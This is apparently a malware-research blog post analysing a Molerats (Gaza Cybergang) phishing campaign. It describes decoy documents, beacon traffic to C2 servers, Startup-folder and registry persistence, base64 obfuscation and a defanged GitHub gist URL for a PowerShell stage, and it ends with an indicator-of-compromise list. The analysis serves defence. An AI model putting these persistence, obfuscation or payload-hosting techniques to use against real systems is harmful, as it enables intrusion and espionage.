Operation Desert Eagle




Operation Desert Eagle takes a look into the recent activity of the Molerats (Gaza cybergang) group. These actors are believed to be politically motivated. For more on their earlier activity, see (http://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf). 


 ---------------------------------------------------------------------------------------------------------------------------

Decoy Docs/Links (Translated):

"Who stands around the attempt to assassinate al – Jubeir"

 

"The quarrel between Trump and Abbas"
 


"Exclusive video of an assassin of the leader of the Hamas movement Mazen Faqha."



"A leaked document that outlines Majid Faraj's plan to install Dahlan as head of the Gaza government!" 

 


 ---------------------------------------------------------------------------------------------------------------------------

 
Malware (NeD Worm?)

The quarrel between Trump and Abbas (a856f56fec6abdc3a93c3715be1567e5)

Network Activity:

DNS request

Server Response


Beacon

Connection check + Host identifier and campaign


Additional Beacon

 

 
2nd part of the beacon

POST /CheckVersion.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: 32170141182235342154130912011691581873993Send-N
Host: xxx.xxx.xxx.xxx
Content-Length: 447
Expect: 100-continue

9568=[host identifier]Random,&1077569=[Base64 Data]

User agent has campaign ID (Send-N, JOND, Random, or FUD) appended to the end of the victim’s unique identifier string.  

Another interesting thing to note is that the backdoor does not make the GET requests to the domain names above (wiknet[.]wikaba[.]com or wiknet[.]moo[.]com). Rather it uses the IP that the host name points to (in this case, my fakenet dns ip).

Let’s take a look on how this network traffic compares to the older NeD Worm samples
  
Above image taken from (http://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf)



---------------------------------------------------------------------------------------------------------------------------
 

Host Activity:

Dropped Files:

C:\Program Files (x86)\%AppDate%\29175\explorer.vbs
C:\Program Files (x86)\%AppDate%\29175\News.url
C:\Users\User\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\explorer.lnk
C:\Users\User\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\explorer.vbs
C:\Users\User\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\powershell.lnk
C:\CheckVersion.php


After execution, a registry key (HKU\...\Software\Microsoft\KeyName:) is created which contains the backdoor in base64.

  
A VBScript replaces the following characters (~&^^%) each with a “0”. After the characters are replaced, the file is then base64 decoded and executed.


  C:\CheckVersion.php – contains the POST data used in the 2nd portion of the beacon


--------------------------------------------------------------------------------------------------------------------------- 


Additional Backdoor Obfuscation/Delivery:

Sample (4cbebeda71dceb9914a21d06e22223af)

Once executed the sample makes a request for:

hxxps://gist[.]githubusercontent[.]com/0lol0/e69206a709a80133aebf55153847a6b2/raw/906a89289a30dbef36b157600fac11f0f04e4684/System.ps1

System.ps1
 

The actors use the same obfuscation technique as the previous sample, this time replacing the following characters “$#~dqw645” with “0”.

 
When taking a look at the github account for user “0lol0” we can see that the actors have reused this account for another sample with a slightly different script.


 
The file 1.ps1 (other file on “0lol0’s” account) is a downloader (most likely for the backdoor):



 ---------------------------------------------------------------------------------------------------------------------------

 
Infrastructure overlaps with Operation Dusty Sky:
 


 ---------------------------------------------------------------------------------------------------------------------------

Indicators Of Compromise:
  
IOC
Type/Comments
Wiknet[.]wikaba[.]com
C&C
Wiknet[.]moo[.]com
C&C
104.200.67[.]190
C&C
a856f56fec6abdc3a93c3715be1567e5
MD5 - The quarrel between Trump and Abbas
91d0770261df8a1b3eba61483fdb255c
MD5 - Who stands around the attempt to assassinate al – Jubeir
b241ae467006667eca4c2619855f5377
MD5 - Exclusive video of an assassin of the leader of the Hamas movement Mazen Faqha.
278440a46195ba8fa628460530e601ed
MD5 - Has honey years ended between Hamas and Al-Thani?
4cbebeda71dceb9914a21d06e22223af
MD5 - A leaked document that outlines Majid Faraj's plan to install Dahlan as head of the Gaza government!
ea406ea60a05afa14f7debc67a75a472
MD5 - Backdoor
1c64b27a58b016a966c654f1fdf4c155
MD5 - Backdoor
c8ab6e29d76d43268a5028f17fe4f48e
MD5 - Backdoor
2a7e0463c7814465f9a78355c4754d0a
MD5 - Backdoor
d01ff6f0bfb1b515e8ba10a453c74d53
MD5 - Backdoor
9bda0be7b30155c26c9236cbac731dbd
MD5 - starts\explorer.vbs


 

Comments

Post a Comment

Popular posts from this blog

Operation JOKAA(RR)

Image
Operation JOKAA(RR) Follow Up to Operation Desert Eagle OSI Actor: Mole Rats / Gaza Cybergang EXECUTIVE SUMMARY Operation JOKAA(RR) Operation JOKAA(RR) looks into the continued activities of the Mole Rats/Gaza Cybergang Threat Actor and their new TTPS. This report builds on their previous activities as found in: Operation Desert Eagle (Malware_Party) http://mymalwareparty.blogspot.com/2017/07/operation-desert-eagle.html Gaza Cybergang (Kaspersky SecureList) https://securelist.com/gaza-cybergang-updated-2017-activity/82765/ Operation Dusty Sky (ClearSky Security) https://www.clearskysec.com/dustysky/ Author @MalwareParty Targeting File Names  The list of file names (Palestine/Hamas) observed gives us an indication into the targeting/region of this threat actor. File Name Translated (Google) محضر اجتماع الرئيس عباس مع وفد المخابرات المصرية .exe  Minutes of the meeting
Read more

Word add-in persistence found in the wild

Image
Word add-in persistence found in the wild @Blu3_team @Malwareparty 20180106 @Malwareparty found another interesting sample using the %temp% known file location for embedded packages but this one works differently. The sample uses CVE-2017-11882 for the exploit and you can see the decoded portion of the command. Functionally the setup.zip is present in the %temp% location but it is also copied to "%APPDATA%\Microsoft\word\startup\w.wll". We don't understand if this is part of the exploit functionality or the packager functionality yet. The sample does not run when viewing the document so we looked at the Word startup location and WLL files and found that they are for Word add-in functionality. A quick test verified that the w.wll file executes at the next start of the Word application which provides a great method of persistence that we have not seen before. From there the malware executes conventionally dropping two executables and beacons over port 44
Read more